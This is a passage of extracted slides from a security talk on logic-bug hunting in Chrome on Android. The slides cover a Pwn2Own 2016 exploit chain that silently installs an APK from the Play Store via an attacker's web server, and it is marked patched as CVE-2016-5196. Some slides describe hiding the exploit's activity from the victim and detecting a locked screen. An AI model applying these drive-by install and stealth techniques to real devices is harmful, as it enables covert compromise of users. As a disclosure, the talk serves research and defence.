![Page 61: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/61.jpg)
store.html (download)
GET /store.html
GET my_downloads/55
store.html
POST /install
settings.html (download)
GET /settings.html
Exploit #3 – Install APK from Play Store
evil.html
store.html (download)
history.back();
settings.html (download)
GET /bounce.html
bounce.html
Attacker’sWeb Server
Google Play Web Server
Victim’sBrowser
AndroidDownload Manager
GET my_downloads/56
settings.html
![Page 62: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/62.jpg)
Mobile Pwn2Own 2016
Category Phone Price (USD)
Obtaining Sensitive Information
Apple iPhone $50,000
Google Nexus $50,000
Samsung Galaxy $35,000
Install Rogue Application
Apple iPhone $125,000
Google Nexus $100,000
Samsung Galaxy $60,000
Force Phone Unlock Apple iPhone $250,000
![Page 63: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/63.jpg)
Keep calm and… aw, snap!
• Pending Chrome update?!• Automatic updates failed us
• Segmentation fault from AJAX requests• Never had time to investigate
• Can still use HTML forms to POST back• Absolute mess compared to AJAX
![Page 64: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/64.jpg)
Where did this bug feature come from?
![Page 65: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/65.jpg)
Exploit Improvement
• Removing Pwn2Own debugging
• Completely removing AJAX
• Moving the bulk of the logic off to the agent• Intelligent agent
• Less C&C traffic
• Hiding malicious activities from the user
![Page 66: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/66.jpg)
Changing Focus
• Prompt for redirecting to another application• Media players, PDF readers and other applications
• <a href=‘rtsp://sexy.time.gov.uk/cam1’>Click me!</a>
• In focus test in JavaScript• document.hidden == true
![Page 67: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/67.jpg)
Toasts
• Small popups at the bottom of the screen
• Automatic file downloads• “Downloading…”
![Page 68: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/68.jpg)
Fasterer and Stealthierer
![Page 69: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/69.jpg)
Going Further
• Wait for the screen to get locked?
• JS is slightly delayed when the browser isn’t in focus, or the lock screen is activated• Loop JS function every 100 ms
• Test time passed since last function call
![Page 70: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/70.jpg)
How realistic is this?
700
750
800
850
900
950
1000
1050
1100
Minimised
![Page 71: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/71.jpg)
How realistic is this?
700
750
800
850
900
950
1000
1050
1100
Minimised Locked
![Page 72: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/72.jpg)
The Patch
• CVE-2016-5196
• Chromium Bug ID 659492
• The content scheme is now a local scheme• Similar to file:// scheme
• Cannot redirect from http:// to content://
• Cannot read other content:// files
![Page 73: Logic Bug Hunting in Chrome on Android - Pwn2Own...Android Mitigations •More and better security mechanisms •Improved rights management, SELinux, TrustZone •ASLR, DEP, PIE, RELRO,](https://reader034.vdocuments.site/reader034/viewer/2022042811/5fa1bbab1a156e59e9137ce2/html5/thumbnails/73.jpg)
Conclusion
• Hunting logic flaws can be rewarding
• Outside-the-box thinking
• Creativity exercise